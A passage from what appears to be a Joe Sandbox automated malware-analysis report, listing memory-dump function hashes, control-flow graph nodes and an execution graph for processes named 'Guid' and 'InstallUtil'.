                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47db62c330ffac3c692ee9047d84fe1311988bd1a92424af04806bde86eb98a5
                                                                          • Instruction ID: b66dc8e0159b9aec6df0968cea3dc76c1cc6c65fed601a538bb7a864685bb219
                                                                          • Opcode Fuzzy Hash: 47db62c330ffac3c692ee9047d84fe1311988bd1a92424af04806bde86eb98a5
                                                                          • Instruction Fuzzy Hash: DEE08C75908248EFC714DFA8E841ABDBFB8EB4A300F10C1AED9485B341C6319E42EF90
                                                                          Function 06075C50 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction ID: 2ac65b07014e5683d9483a8ba4d83a13e6e937a380121ec3c474c49989689583
                                                                          • Opcode Fuzzy Hash: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction Fuzzy Hash: 2CE0E574D04248EFCB85DF94D940AACBBB4EB48201F14C1AA984853341DA319B51DF84
                                                                          Function 060759A0 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction ID: 252dcba77288dbc9261a6c37a492b4a01b56fff71edd5e752782682635173ead
                                                                          • Opcode Fuzzy Hash: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction Fuzzy Hash: C0E0E5B4D05248AFDB85DF94E940AACBBB5EB48210F10C1AADC4853341DA319A51DF84
                                                                          Function 07698B50 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb784773bc3037675e62e187647a81e48d4f8923a302b1b400195cfbd63b10c4
                                                                          • Instruction ID: ce0ac9be566524ac6bcefcc183439a09f2f97d044359aa4d2eb7e4aa73d369a6
                                                                          • Opcode Fuzzy Hash: fb784773bc3037675e62e187647a81e48d4f8923a302b1b400195cfbd63b10c4
                                                                          • Instruction Fuzzy Hash: D8E04FB4D04248EFCB04DFA4D4406BCFBB8EB49210F14C1EAC81953345D6319E42DF44
                                                                          Function 06073488 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98a234c2c987afba087ff20abd6ab6768ee7a9284ea7b3d92e4842785ebf902b
                                                                          • Instruction ID: e4534f6c8addf4d3b7e4a1d08b7d7f39742f41b1e2365a4fa8665831c39c5e96
                                                                          • Opcode Fuzzy Hash: 98a234c2c987afba087ff20abd6ab6768ee7a9284ea7b3d92e4842785ebf902b
                                                                          • Instruction Fuzzy Hash: B8F0157584461FDBCF21AF60C814ADAB732FF54304F108286AA5933210DB30AADACF80
                                                                          Function 060725A0 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cf1cb683a8641171aa6f2be42ded8975d113d81dd4f0bcc9c7da81181ea66d2
                                                                          • Instruction ID: 54dcd910272126e0e1b0790c4196dd412a8240be984961ebf14673d1817d6ebe
                                                                          • Opcode Fuzzy Hash: 7cf1cb683a8641171aa6f2be42ded8975d113d81dd4f0bcc9c7da81181ea66d2
                                                                          • Instruction Fuzzy Hash: 6AE0E57494410CDFDF559F84C844AEEBB72FB48305F008008E60566294C7794A85DBA4
                                                                          Function 0769E370 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d8d6ed041ce157601e9fbae6c42dbaa1a6f7f57111a3db60f050dd9a8ef71a7
                                                                          • Instruction ID: c7c5564c237b2d9fa4ed1dbc91b02baf824e91a91a8cb5046b103eae6b4aac12
                                                                          • Opcode Fuzzy Hash: 4d8d6ed041ce157601e9fbae6c42dbaa1a6f7f57111a3db60f050dd9a8ef71a7
                                                                          • Instruction Fuzzy Hash: C3E01275908208DBCB04DFA4E94566CBBBDEB45304F1081E9D80957341D7729E42DF81
                                                                          Function 0769B6F0 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c204f631c603068bd44ba4bbd0f95aeef9f6abe7dbdd13041eaf691e2e62df22
                                                                          • Instruction ID: 228154eb196e5f5754970150f5d6a207bd5e7721bb783bf61c81c374033798eb
                                                                          • Opcode Fuzzy Hash: c204f631c603068bd44ba4bbd0f95aeef9f6abe7dbdd13041eaf691e2e62df22
                                                                          • Instruction Fuzzy Hash: 22E0C7B280120CEBCB01FFF4E8046AE7BBCEB05200F0029A6C10997240EE728E00DF92
                                                                          Function 015AD608 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b985a97c9a6c7425d06b4e0d8fdaa2d1fe86a69a582c022de4d1dc6483da4ac
                                                                          • Instruction ID: f334f38d3068f798c5a02a287c21687e09e84b41e2edb2637c275cafb8997797
                                                                          • Opcode Fuzzy Hash: 8b985a97c9a6c7425d06b4e0d8fdaa2d1fe86a69a582c022de4d1dc6483da4ac
                                                                          • Instruction Fuzzy Hash: FEE0EC72400248EFDB41EFE4A90865E7BB9EB0A211F0055A5960997150EA714E449F95
                                                                          Function 06075E80 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f540bf189e7337a0c2c48faa658584d76ca853289922e66f33cf94dee911f330
                                                                          • Instruction ID: 6aa6d157099335d66eb5c20dcd62ec932dcf1a695159e5e2e47e6a48fa6cc08b
                                                                          • Opcode Fuzzy Hash: f540bf189e7337a0c2c48faa658584d76ca853289922e66f33cf94dee911f330
                                                                          • Instruction Fuzzy Hash: CFE01234D4824CDFC759DF94E9456ACBBB8EB45304F1095D9C80817341EB71AE42DF85
                                                                          Function 060764A0 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f540bf189e7337a0c2c48faa658584d76ca853289922e66f33cf94dee911f330
                                                                          • Instruction ID: dc07ebc9c06c8b619e9bb39d7a95ea6c734619e549572cadc0a71427d52c8c33
                                                                          • Opcode Fuzzy Hash: f540bf189e7337a0c2c48faa658584d76ca853289922e66f33cf94dee911f330
                                                                          • Instruction Fuzzy Hash: 44E01275D48208DFCB44DF94E95566CBBB9EB45304F1081D9C80D17341D7729E82DF85
                                                                          Function 06070578 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 18bea4ea4f0eb61782e5d3f1caf85af887d237dafe0a41e4c25f743b3ba16c5e
                                                                          • Instruction ID: d6cb5c1097b3cfb904be3d2232395c8bbe1b5127203e0436e23dab72d4a6b19e
                                                                          • Opcode Fuzzy Hash: 18bea4ea4f0eb61782e5d3f1caf85af887d237dafe0a41e4c25f743b3ba16c5e
                                                                          • Instruction Fuzzy Hash: 83E0EC718412499BC781FFE4990469E7BB89B49200F0055A5850997650EA714E44DB95
                                                                          Function 06070BD8 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f540bf189e7337a0c2c48faa658584d76ca853289922e66f33cf94dee911f330
                                                                          • Instruction ID: 02f5b4bda3cd7a0095daad0e58f50a00c284a3392863d8d5122400c3c79f82c9
                                                                          • Opcode Fuzzy Hash: f540bf189e7337a0c2c48faa658584d76ca853289922e66f33cf94dee911f330
                                                                          • Instruction Fuzzy Hash: D0E0EC74D48248DBC744DF94E98566CBBB8AB45304F108299880917341DA71AF82DB85
                                                                          Function 060712B8 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f09cc4567d5d5982fc9e352904cef1d9c7fea0ef7fa2e0b74a835211b951a037
                                                                          • Instruction ID: fbf467d5cc0c7c0225f50add1b17a38f0f74619838cae6abda451eac11696085
                                                                          • Opcode Fuzzy Hash: f09cc4567d5d5982fc9e352904cef1d9c7fea0ef7fa2e0b74a835211b951a037
                                                                          • Instruction Fuzzy Hash: 97E0C230D08248DFC780DFA4E4002BCBFF8AB06200F1480D9CC4893381D6319E52CF90
                                                                          Function 060724D3 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5a2b4d752c43d55efa3fed3a3781cc5f9fbfafd756c9eae551c58786a7ae7832
                                                                          • Instruction ID: 80ce589d35078e4b0f0f77b485a911c3aec9b497ca5009e9103ebd2c6b735bcd
                                                                          • Opcode Fuzzy Hash: 5a2b4d752c43d55efa3fed3a3781cc5f9fbfafd756c9eae551c58786a7ae7832
                                                                          • Instruction Fuzzy Hash: 47E08CB0D904088FDB95AF84C888AED7F72FB44354F108004D60797210CB355943DB28
                                                                          Function 06074791 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fdf153a77148a41526f6b620356a63fe69930d6c7dee0de77d8fbafbc64e982d
                                                                          • Instruction ID: 6d3ddaee7c83fdc9775c1ee85f37fbbc21c3fafe78f6ed99d9387dfda57b201f
                                                                          • Opcode Fuzzy Hash: fdf153a77148a41526f6b620356a63fe69930d6c7dee0de77d8fbafbc64e982d
                                                                          • Instruction Fuzzy Hash: 7EE0E57490421C8FDB51DF94DC90BDEBBB9FB58341F104196E589A7244C6345E80CF50
                                                                          Function 015A0868 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 26c2bf75d895684a0e170649c0550439d7ed7a1057aef34dcff6861257fcae37
                                                                          • Instruction ID: 4194ae4cf1594d786da92d16f6d904052b9cf4b75de39119f5e8d8dc590e17b0
                                                                          • Opcode Fuzzy Hash: 26c2bf75d895684a0e170649c0550439d7ed7a1057aef34dcff6861257fcae37
                                                                          • Instruction Fuzzy Hash: A8D05B70A1010DFFCB00DFB4E94055DB7F5EB84244F50459ED908D3200DA717F009B80
                                                                          Function 0769E780 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 293f3750272c067daa8a475dd70d9d02ff9efad289d33947d73f8f57c3ed61c4
                                                                          • Instruction ID: 3c608435b1ca5535f46ffa540ca353ea4f6bb31f0bcfa1d547cc9cf1b0e490df
                                                                          • Opcode Fuzzy Hash: 293f3750272c067daa8a475dd70d9d02ff9efad289d33947d73f8f57c3ed61c4
                                                                          • Instruction Fuzzy Hash: 9AC02BB304938987E720E6607C0C3343BAC8B03205F001420820E0002157F1C890CF43
                                                                          Function 015A0840 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e4d3dcebf8e425b847e6b43c9fa6ec8f4fe239be78639b383c02b8f77488dd94
                                                                          • Instruction ID: 96f84d2b29f8423719583239f6fdf1abe8d469fdc5cc84482710d262c8799e13
                                                                          • Opcode Fuzzy Hash: e4d3dcebf8e425b847e6b43c9fa6ec8f4fe239be78639b383c02b8f77488dd94
                                                                          • Instruction Fuzzy Hash: DDC04CA186A3C19EAF960A78142C18C7F61EB9BA5178904CAF1848A0D755412809937F
                                                                          Function 015AD438 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f1a5a830ab411bae33e39a0ca929828d9f98ef44561182e70084092f1c764b01
                                                                          • Instruction ID: a4036d06597b5d66e5f0433925fffe3faab1c8cd9caafb4d8d30f0bb0e15e2fd
                                                                          • Opcode Fuzzy Hash: f1a5a830ab411bae33e39a0ca929828d9f98ef44561182e70084092f1c764b01
                                                                          • Instruction Fuzzy Hash: BFC08C3208034887D35077E4790D37C327C6B81125F840001C30C01800AAE05880DE27

                                                                          Execution Graph

                                                                          Execution Coverage:11.7%
                                                                          Dynamic/Decrypted Code Coverage:71.4%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:35
                                                                          Total number of Limit Nodes:7
                                                                          execution_graph 26419 fe099b 26421 fe084e 26419->26421 26420 fe091b 26421->26419 26421->26420 26424 fe132f 26421->26424 26430 fe143b 26421->26430 26425 fe1314 26424->26425 26427 fe1333 26424->26427 26425->26421 26426 fe1434 26426->26421 26427->26426 26428 fe143b 3 API calls 26427->26428 26435 fe7040 26427->26435 26428->26427 26431 fe1346 26430->26431 26432 fe1434 26431->26432 26433 fe143b 3 API calls 26431->26433 26434 fe7040 3 API calls 26431->26434 26432->26421 26433->26431 26434->26431 26436 fe704a 26435->26436 26437 fe708c 26436->26437 26443 5e1cae1 26436->26443 26448 5e1cae8 26436->26448 26437->26427 26438 fe705d 26453 5e1de88 26438->26453 26457 5e1de78 26438->26457 26444 5e1cae8 26443->26444 26445 5e1cd0e 26444->26445 26446 5e1d128 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26444->26446 26447 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26444->26447 26445->26438 26446->26444 26447->26444 26449 5e1cafd 26448->26449 26450 5e1cd0e 26449->26450 26451 5e1d128 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26449->26451 26452 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26449->26452 26450->26438 26451->26449 26452->26449 26456 5e1de89 26453->26456 26454 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26454->26456 26455 5e1e0e9 26455->26437 26456->26454 26456->26455 26459 5e1de84 26457->26459 26458 5e1e0e9 26458->26437 26459->26458 26460 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26459->26460 26460->26459

                                                                          Executed Functions

                                                                          Function 00FE9AE8 Relevance: 2.9, Instructions: 2876COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0085a52973972b51eb8f1a357600040d13e5227cb0aa47eaa921bd46134fb063
                                                                          • Instruction ID: 2a9050b17f06e92cd6fd2e12439002317e2df7ab32d3466259dcc9251e72909f
                                                                          • Opcode Fuzzy Hash: 0085a52973972b51eb8f1a357600040d13e5227cb0aa47eaa921bd46134fb063
                                                                          • Instruction Fuzzy Hash: B6630731C10B5A8ACB51EF69C8805A9F7B1FF99310F14C79AE4587B121FB70AAD5CB81
                                                                          Function 00FE4A48 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 577 fe4a48-fe4aae 580 fe4af8-fe4afa 577->580 581 fe4ab0-fe4abb 577->581 583 fe4afc-fe4b15 580->583 581->580 582 fe4abd-fe4ac9 581->582 584 fe4aec-fe4af6 582->584 585 fe4acb-fe4ad5 582->585 590 fe4b17-fe4b23 583->590 591 fe4b61-fe4b63 583->591 584->583 586 fe4ad9-fe4ae8 585->586 587 fe4ad7 585->587 586->586 589 fe4aea 586->589 587->586 589->584 590->591 593 fe4b25-fe4b31 590->593 592 fe4b65-fe4b7d 591->592 600 fe4b7f-fe4b8a 592->600 601 fe4bc7-fe4bc9 592->601 594 fe4b54-fe4b5f 593->594 595 fe4b33-fe4b3d 593->595 594->592 597 fe4b3f 595->597 598 fe4b41-fe4b50 595->598 597->598 598->598 599 fe4b52 598->599 599->594 600->601 602 fe4b8c-fe4b98 600->602 603 fe4bcb-fe4be3 601->603 604 fe4b9a-fe4ba4 602->604 605 fe4bbb-fe4bc5 602->605 609 fe4c2d-fe4c2f 603->609 610 fe4be5-fe4bf0 603->610 607 fe4ba8-fe4bb7 604->607 608 fe4ba6 604->608 605->603 607->607 611 fe4bb9 607->611 608->607 613 fe4c31-fe4ca4 609->613 610->609 612 fe4bf2-fe4bfe 610->612 611->605 614 fe4c00-fe4c0a 612->614 615 fe4c21-fe4c2b 612->615 622 fe4caa-fe4cb8 613->622 616 fe4c0e-fe4c1d 614->616 617 fe4c0c 614->617 615->613 616->616 619 fe4c1f 616->619 617->616 619->615 623 fe4cba-fe4cc0 622->623 624 fe4cc1-fe4d21 622->624 623->624 631 fe4d23-fe4d27 624->631 632 fe4d31-fe4d35 624->632 631->632 633 fe4d29 631->633 634 fe4d37-fe4d3b 632->634 635 fe4d45-fe4d49 632->635 633->632 634->635 636 fe4d3d 634->636 637 fe4d4b-fe4d4f 635->637 638 fe4d59-fe4d5d 635->638 636->635 637->638 639 fe4d51 637->639 640 fe4d5f-fe4d63 638->640 641 fe4d6d-fe4d71 638->641 639->638 640->641 642 fe4d65 640->642 643 fe4d73-fe4d77 641->643 644 fe4d81-fe4d85 641->644 642->641 643->644 645 fe4d79-fe4d7c call fe0ab8 643->645 646 fe4d87-fe4d8b 644->646 647 fe4d95 644->647 645->644 646->647 649 fe4d8d-fe4d90 call fe0ab8 646->649 651 fe4d96 647->651 649->647 651->651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: f7de3a339c63374ad85d66c840c43f29f769d824b9a5da7d48f4f972b7b2c386
                                                                          • Instruction ID: 5677df5a7690f314ec6ba035b386dd5c7f1486e37c5479c0cde7be4a3ec773e5
                                                                          • Opcode Fuzzy Hash: f7de3a339c63374ad85d66c840c43f29f769d824b9a5da7d48f4f972b7b2c386
                                                                          • Instruction Fuzzy Hash: ABB16E70E00249CFDF10CFAAD88579DBBF2AF88724F24852DD815E7294EB74A845DB81
                                                                          Function 00FE3E30 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 728 fe3e30-fe3e96 730 fe3e98-fe3ea3 728->730 731 fe3ee0-fe3ee2 728->731 730->731 733 fe3ea5-fe3eb1 730->733 732 fe3ee4-fe3f3c 731->732 742 fe3f3e-fe3f49 732->742 743 fe3f86-fe3f88 732->743 734 fe3ed4-fe3ede 733->734 735 fe3eb3-fe3ebd 733->735 734->732 737 fe3ebf 735->737 738 fe3ec1-fe3ed0 735->738 737->738 738->738 739 fe3ed2 738->739 739->734 742->743 745 fe3f4b-fe3f57 742->745 744 fe3f8a-fe3fa2 743->744 751 fe3fec-fe3fee 744->751 752 fe3fa4-fe3faf 744->752 746 fe3f7a-fe3f84 745->746 747 fe3f59-fe3f63 745->747 746->744 749 fe3f67-fe3f76 747->749 750 fe3f65 747->750 749->749 753 fe3f78 749->753 750->749 755 fe3ff0-fe403e 751->755 752->751 754 fe3fb1-fe3fbd 752->754 753->746 756 fe3fbf-fe3fc9 754->756 757 fe3fe0-fe3fea 754->757 763 fe4044-fe4052 755->763 758 fe3fcd-fe3fdc 756->758 759 fe3fcb 756->759 757->755 758->758 761 fe3fde 758->761 759->758 761->757 764 fe405b-fe40bb 763->764 765 fe4054-fe405a 763->765 772 fe40bd-fe40c1 764->772 773 fe40cb-fe40cf 764->773 765->764 772->773 774 fe40c3 772->774 775 fe40df-fe40e3 773->775 776 fe40d1-fe40d5 773->776 774->773 778 fe40e5-fe40e9 775->778 779 fe40f3-fe40f7 775->779 776->775 777 fe40d7-fe40da call fe0ab8 776->777 777->775 778->779 783 fe40eb-fe40ee call fe0ab8 778->783 780 fe40f9-fe40fd 779->780 781 fe4107-fe410b 779->781 780->781 784 fe40ff-fe4102 call fe0ab8 780->784 785 fe410d-fe4111 781->785 786 fe411b-fe411f 781->786 783->779 784->781 785->786 789 fe4113 785->789 790 fe412f 786->790 791 fe4121-fe4125 786->791 789->786 793 fe4130 790->793 791->790 792 fe4127 791->792 792->790 793->793
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 70395c1b7d175de48ea9743f55eb91a524abb8d5955c6db34c144e94926a1772
                                                                          • Instruction ID: 129ae79b001abb34b63e1d0f9c7eeda15ff8aa1f6f4014b391a953f6112a7b71
                                                                          • Opcode Fuzzy Hash: 70395c1b7d175de48ea9743f55eb91a524abb8d5955c6db34c144e94926a1772
                                                                          • Instruction Fuzzy Hash: 5E916F70E00389CFDF14CFAAD98979EBBF2AF88714F148129E405A7254DB749985DF81
                                                                          Function 00FECD60 Relevance: 2.3, Instructions: 2301COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ff0a9b8c886d7c76617ce0fdc234574dd42df140e4420bc37c0b60af6ce8fd6f
                                                                          • Instruction ID: 78f4a476b85230bb9bd92a075143d72d2886ef1fa51999c5e5d9fcf4208880d3
                                                                          • Opcode Fuzzy Hash: ff0a9b8c886d7c76617ce0fdc234574dd42df140e4420bc37c0b60af6ce8fd6f
                                                                          • Instruction Fuzzy Hash: 28332E31D1075A8ECB11EF69C8806ADF7B1FF99300F15C79AE459A7211EB70AAC5CB81
                                                                          Function 00FE9338 Relevance: .6, Instructions: 623COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9f6b1aab75204ba2cae6b1bfdf37daf326a5711c8db8696842b897de844bb215
